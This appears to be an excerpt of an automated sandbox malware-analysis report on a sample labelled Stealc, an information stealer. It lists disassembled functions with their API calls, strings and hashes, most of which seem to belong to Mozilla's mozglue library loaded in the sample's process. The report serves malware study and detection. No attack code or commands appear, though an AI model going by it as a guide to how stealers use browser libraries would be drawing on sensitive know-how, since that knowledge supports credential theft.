Opcode ID: 123f5a31dd61819f14b2774ff56f3dfe3d5629aea75686cf4c6c52313bf76de2
Instruction ID: 8684f601099a95827e92be8de603135b142e09e0b38de4a389eda76c6cb49610
Opcode Fuzzy Hash: 123f5a31dd61819f14b2774ff56f3dfe3d5629aea75686cf4c6c52313bf76de2
Instruction Fuzzy Hash: DE218B743006018FEB24EB28C898A6AB7B5AF9430DF24492DE55B83B41EF31F948CB51

Function 6C0D1640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,00000114), ref: 6C0D1699
VerSetConditionMask.NTDLL ref: 6C0D16CB
VerSetConditionMask.NTDLL ref: 6C0D16D7
VerSetConditionMask.NTDLL ref: 6C0D16DE
VerSetConditionMask.NTDLL ref: 6C0D16E5
VerSetConditionMask.NTDLL ref: 6C0D16EC
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C0D16F9

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemset
String ID:
API String ID: 375572348-0
Opcode ID: 8c5c0699e8fa4474196e804673aaf6eb95c6743781781570159929e2018a2cb3
Instruction ID: 5ef456996773708a2d993be6c62d9ccffdd3c4ef6c5390e726d0f36777be7fb6
Opcode Fuzzy Hash: 8c5c0699e8fa4474196e804673aaf6eb95c6743781781570159929e2018a2cb3
Instruction Fuzzy Hash: 9221A5B07403086FEB116B648C45FBBB3BCDF86718F458528F6459B6C1CA74AE54C6A1

Function 6C11D1D0 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C11D1EC
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C11D1F5

Part of subcall function 6C11AD40: moz_malloc_usable_size.MOZGLUE(?), ref: 6C11AE20

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C11D211
GetCurrentThreadId.KERNEL32 ref: 6C11D217
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C11D226
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C11D279
free.MOZGLUE(?), ref: 6C11D2B2

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$freemoz_malloc_usable_size
String ID:
API String ID: 3049780610-0
Opcode ID: 6d46a073bc19bba9f4b7b2c3917fea7d600d70dc7fdfc201f48e6a774dc60bc3
Instruction ID: a360fe8d2868acf23d0704087a4df289d192242a450d9e37b72c1717da40478a
Opcode Fuzzy Hash: 6d46a073bc19bba9f4b7b2c3917fea7d600d70dc7fdfc201f48e6a774dc60bc3
Instruction Fuzzy Hash: 15218071704705DFCB05EF24C488A9EB7B1FF8A328F50462DE52687740DB34A909CB96

Function 6C10F5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0FCBE8: GetCurrentProcess.KERNEL32(?,6C0C31A7), ref: 6C0FCBF1
Part of subcall function 6C0FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0C31A7), ref: 6C0FCBFA

Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0D4A68), ref: 6C10945E
Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C109470
Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C109482
Part of subcall function 6C109420: __Init_thread_footer.LIBCMT ref: 6C10949F

GetCurrentThreadId.KERNEL32 ref: 6C10F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C10F598), ref: 6C10F621

Part of subcall function 6C1094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1094EE
Part of subcall function 6C1094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C109508

GetCurrentThreadId.KERNEL32 ref: 6C10F637
AcquireSRWLockExclusive.KERNEL32(6C14F4B8,?,?,00000000,?,6C10F598), ref: 6C10F645
ReleaseSRWLockExclusive.KERNEL32(6C14F4B8,?,?,00000000,?,6C10F598), ref: 6C10F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C10F62A

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 1579816589-753366533
Opcode ID: a51ee48e2af0f83b454397f1823f3f6f4a53ac273a1fb95901e1d932e5dfc092
Instruction ID: 33d30d302f2d85951f7226ff8baaa08c6521efb93eb99f0b1d67b2bf48cf2b74
Opcode Fuzzy Hash: a51ee48e2af0f83b454397f1823f3f6f4a53ac273a1fb95901e1d932e5dfc092
Instruction Fuzzy Hash: 1011E375301604ABCA04BF19D949EE97779FB8636CF544025EA1583F41CF31A822CBA4

Function 6C0D2070 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0FAB89: EnterCriticalSection.KERNEL32(6C14E370,?,?,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284), ref: 6C0FAB94
Part of subcall function 6C0FAB89: LeaveCriticalSection.KERNEL32(6C14E370,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0FABD1

LoadLibraryW.KERNEL32(combase.dll,6C0D1C5F), ref: 6C0D20AE
GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C0D20CD
__Init_thread_footer.LIBCMT ref: 6C0D20E1
FreeLibrary.KERNEL32 ref: 6C0D2124

Strings

CoInitializeSecurity, xrefs: 6C0D20C7
combase.dll, xrefs: 6C0D20A9

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeSecurity$combase.dll
API String ID: 4190559335-2476802802
Opcode ID: 6f6d386bdc7d969b43fe4228584b193baece86d7597f100cfae1e231424131b6
Instruction ID: 6eafc26aa3344e8ad64aa2ece824bb435c473a34eba786c9f49b247de9a372a3
Opcode Fuzzy Hash: 6f6d386bdc7d969b43fe4228584b193baece86d7597f100cfae1e231424131b6
Instruction Fuzzy Hash: 70213976200209EBDF11EF95DC48E9A3FB6FB4A369F118024FA2496711D731A861EF60

Function 6C1099A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0D4A68), ref: 6C10945E
Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C109470
Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C109482
Part of subcall function 6C109420: __Init_thread_footer.LIBCMT ref: 6C10949F

GetCurrentThreadId.KERNEL32 ref: 6C1099C1
AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C1099CE
ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C1099F8
GetCurrentThreadId.KERNEL32 ref: 6C109A05
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C109A0D

Part of subcall function 6C109A60: GetCurrentThreadId.KERNEL32 ref: 6C109A95
Part of subcall function 6C109A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C109A9D
Part of subcall function 6C109A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C109ACC
Part of subcall function 6C109A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C109BA7
Part of subcall function 6C109A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C109BB8
Part of subcall function 6C109A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C109BC9

Part of subcall function 6C0FCBE8: GetCurrentProcess.KERNEL32(?,6C0C31A7), ref: 6C0FCBF1
Part of subcall function 6C0FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0C31A7), ref: 6C0FCBFA

Strings

[I %d/%d] profiler_stream_json_for_this_process, xrefs: 6C109A15

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Current$ThreadTimegetenv$ExclusiveLockProcessStampV01@@Value@mozilla@@_getpid$?profiler_time@baseprofiler@mozilla@@AcquireInit_thread_footerNow@ReleaseStamp@mozilla@@TerminateV12@_
String ID: [I %d/%d] profiler_stream_json_for_this_process
API String ID: 2359002670-141131661
Opcode ID: 7e0c5f0bec601ec186c64e1cb254d3c6ba93cf18d46b48712903ce917de6fec8
Instruction ID: 7229cd574d5315dcf3dee671c0f3471570b6f3323f2b62838cba4db81cd042dc
Opcode Fuzzy Hash: 7e0c5f0bec601ec186c64e1cb254d3c6ba93cf18d46b48712903ce917de6fec8
Instruction Fuzzy Hash: 82012635B04524DBDB007F2594397A93B78EB8232CF09C116FD1553B41CF340806D6B1

Function 6C0D1FA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0FAB89: EnterCriticalSection.KERNEL32(6C14E370,?,?,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284), ref: 6C0FAB94
Part of subcall function 6C0FAB89: LeaveCriticalSection.KERNEL32(6C14E370,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0FABD1

LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C0D1FDE
GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C0D1FFD
__Init_thread_footer.LIBCMT ref: 6C0D2011
FreeLibrary.KERNEL32 ref: 6C0D2059

Strings

CoCreateInstance, xrefs: 6C0D1FF7
combase.dll, xrefs: 6C0D1FD9

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoCreateInstance$combase.dll
API String ID: 4190559335-2197658831
Opcode ID: a7e9f9dc8a574e4cac2d15adf5d4096f2660ef05944bfe5ccb7ed23ed3e1924c
Instruction ID: f641bca5dffc1cdd46ed6c4b434050233a841dbef184da4e445658c75100e13e
Opcode Fuzzy Hash: a7e9f9dc8a574e4cac2d15adf5d4096f2660ef05944bfe5ccb7ed23ed3e1924c
Instruction Fuzzy Hash: 1D116A75301204EFEF10EF55C84CF5A3BB9EB8635DF10C029E92496741C731A851EEA0

Function 6C0D0EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0FAB89: EnterCriticalSection.KERNEL32(6C14E370,?,?,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284), ref: 6C0FAB94
Part of subcall function 6C0FAB89: LeaveCriticalSection.KERNEL32(6C14E370,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0FABD1

LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C0FD9F0,00000000), ref: 6C0D0F1D
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C0D0F3C
__Init_thread_footer.LIBCMT ref: 6C0D0F50
FreeLibrary.KERNEL32(?,6C0FD9F0,00000000), ref: 6C0D0F86

Strings

CoInitializeEx, xrefs: 6C0D0F36
combase.dll, xrefs: 6C0D0F18

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeEx$combase.dll
API String ID: 4190559335-2063391169
Opcode ID: f60e1607bc550afeb0dad14314ba227207637dc0508dfcb87bbec8acb01320e9
Instruction ID: a5e5b5246dea8a0f4882b71292692b3ecbad20431cf6912c8e51d78cb8c054e0
Opcode Fuzzy Hash: f60e1607bc550afeb0dad14314ba227207637dc0508dfcb87bbec8acb01320e9
Instruction Fuzzy Hash: 8B11A078209350DBDF00EF59C908F4A37F4EB8A32EF52C229F92996B41D730A401DE62

Function 6C10F540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0D4A68), ref: 6C10945E
Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C109470
Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C109482
Part of subcall function 6C109420: __Init_thread_footer.LIBCMT ref: 6C10949F

GetCurrentThreadId.KERNEL32 ref: 6C10F559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C10F561

Part of subcall function 6C1094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1094EE
Part of subcall function 6C1094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C109508

GetCurrentThreadId.KERNEL32 ref: 6C10F577
AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10F585
ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10F5A3

Strings

[I %d/%d] profiler_resume, xrefs: 6C10F239
[I %d/%d] profiler_resume_sampling, xrefs: 6C10F499
[I %d/%d] profiler_pause_sampling, xrefs: 6C10F3A8
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C10F56A

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: 0ecee7cf701422e55eae16eb286285bdfb9bc1be98ea4f34a89ffaccd741c1ce
Instruction ID: d97e4b620aeb52fd0697add4c3a81dcad95a1f90d1539c7f0c035921b44bc4a4
Opcode Fuzzy Hash: 0ecee7cf701422e55eae16eb286285bdfb9bc1be98ea4f34a89ffaccd741c1ce
Instruction Fuzzy Hash: D2F0BE76300604ABDA007B65A858E6E7BBCEB8A2ADF048061EA1593741DF3588029B65

Function 6C10F600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0D4A68), ref: 6C10945E
Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C109470
Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C109482
Part of subcall function 6C109420: __Init_thread_footer.LIBCMT ref: 6C10949F

GetCurrentThreadId.KERNEL32 ref: 6C10F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C10F598), ref: 6C10F621

Part of subcall function 6C1094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1094EE
Part of subcall function 6C1094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C109508

GetCurrentThreadId.KERNEL32 ref: 6C10F637
AcquireSRWLockExclusive.KERNEL32(6C14F4B8,?,?,00000000,?,6C10F598), ref: 6C10F645
ReleaseSRWLockExclusive.KERNEL32(6C14F4B8,?,?,00000000,?,6C10F598), ref: 6C10F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C10F62A

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 2848912005-753366533
Opcode ID: e223d58391ad8bd4e301d9657e68244d9652a55b2474fa10609a6c1fd224567f
Instruction ID: 12c3c83c2a5745acc83dd2a715976cfb70baab7f5e8dd4723e43c1d742c1ef7e
Opcode Fuzzy Hash: e223d58391ad8bd4e301d9657e68244d9652a55b2474fa10609a6c1fd224567f
Instruction Fuzzy Hash: A5F0BEB5300604ABDA007B659858E5E7B7CEBC62ADF048061EA1593741DF3548028765

Function 6C0D0E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernel32.dll,6C0D0DF8), ref: 6C0D0E82
GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C0D0EA1
__Init_thread_footer.LIBCMT ref: 6C0D0EB5
FreeLibrary.KERNEL32 ref: 6C0D0EC5

Strings

kernel32.dll, xrefs: 6C0D0E7D
GetProcessMitigationPolicy, xrefs: 6C0D0E9B

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeInit_thread_footerLoadProc
String ID: GetProcessMitigationPolicy$kernel32.dll
API String ID: 391052410-1680159014
Opcode ID: 78fc6039055934e4dd444415c26c8d0eca37274d8c9f4b3a956b6885f9c248fa
Instruction ID: 53663ea2ac25c121890368495039900b6865c24778e48265adf9f3923a594797
Opcode Fuzzy Hash: 78fc6039055934e4dd444415c26c8d0eca37274d8c9f4b3a956b6885f9c248fa
Instruction Fuzzy Hash: D40146747043C28BEF00AFE9C81CB4A73F6E74631EF11A925E92992F40D73DB445AA11

Function 6C1005F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C0FCFAE,?,?,?,6C0C31A7), ref: 6C1005FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C0FCFAE,?,?,?,6C0C31A7), ref: 6C100616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C0C31A7), ref: 6C10061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C0C31A7), ref: 6C100627

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C10061B, 6C100625
<jemalloc>, xrefs: 6C1005FA, 6C10060F

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: 85666fc18045c799ef00c2c4c254f3cab7bada732f7962af0c00e751aed17fa3
Instruction ID: 61e7faf268a4d71a59948a5a7242c805702cae4a0488b43ca6557560d8adb0ff
Opcode Fuzzy Hash: 85666fc18045c799ef00c2c4c254f3cab7bada732f7962af0c00e751aed17fa3
Instruction Fuzzy Hash: 35E08CE2A0202037F6142256AC86EBB761CDBC6538F084139FD0D86301E94AAD1A51F6

Function 6C119240 Relevance: 9.3, APIs: 6, Instructions: 289timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C119BAE
free.MOZGLUE(?,?), ref: 6C119BC3
free.MOZGLUE(?,?), ref: 6C119BD9

Part of subcall function 6C1193B0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C1194C8
Part of subcall function 6C1193B0: free.MOZGLUE(6C119281,?), ref: 6C1194DD

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: ef9552fb0f204fb26665068606a66f21f8cb0283de1cab8ecfcaf476614b0c71
Instruction ID: 6341cecb0c8fae8728374573bd274ecc23e4113e7de1664c5a04e771036f0306
Opcode Fuzzy Hash: ef9552fb0f204fb26665068606a66f21f8cb0283de1cab8ecfcaf476614b0c71
Instruction Fuzzy Hash: B4B1B171A087458BCB05CF58C49069FF3F5BFD8328F148629E8699BB40EB34E946CB91

Function 6C0D05F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f00c1913b770eabffb436baa31c174814bdb05d1fba28dc9ad19847dda0f143
Instruction ID: 30173a19d54d8dca3a1f1187010ae205947c789854fa35408b5dc23869cf3540
Opcode Fuzzy Hash: 9f00c1913b770eabffb436baa31c174814bdb05d1fba28dc9ad19847dda0f143
